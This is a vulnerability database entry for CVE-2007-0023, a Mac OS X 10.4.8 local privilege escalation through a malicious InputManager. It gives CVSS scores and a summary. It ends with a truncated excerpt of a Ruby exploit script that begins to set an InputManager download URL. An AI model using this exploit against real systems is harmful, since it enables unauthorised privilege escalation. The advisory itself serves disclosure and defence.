6.9
CVSSv2

CVE-2007-0023

Published: 24/01/2007 Updated: 29/07/2017
CVSS v2 Base Score: 6.9 | Impact Score: 10 | Exploitability Score: 3.4
VMScore: 695
Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

The CFUserNotificationSendRequest function in UserNotificationCenter.app in Apple Mac OS X 10.4.8, when used in combination with diskutil, allows local users to gain privileges via a malicious InputManager in Library/InputManagers in a user's home directory, which is executed when Cocoa applications attempt to notify the user.

Vulnerable Product Search on Vulmon Subscribe to Product

apple mac os x 10.4.8

Exploits

#!/usr/bin/ruby # Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunitioncom> # Lance M Havok <lmh [at] info-pullcom> # All pwnage reserved # # "Exploit" for MOAB-22-01-2007: All your crash are belong to us # require 'fileutils' bugselected = (ARGV[0] || 0)to_i # INPUTMANAGER_URL = "pro ...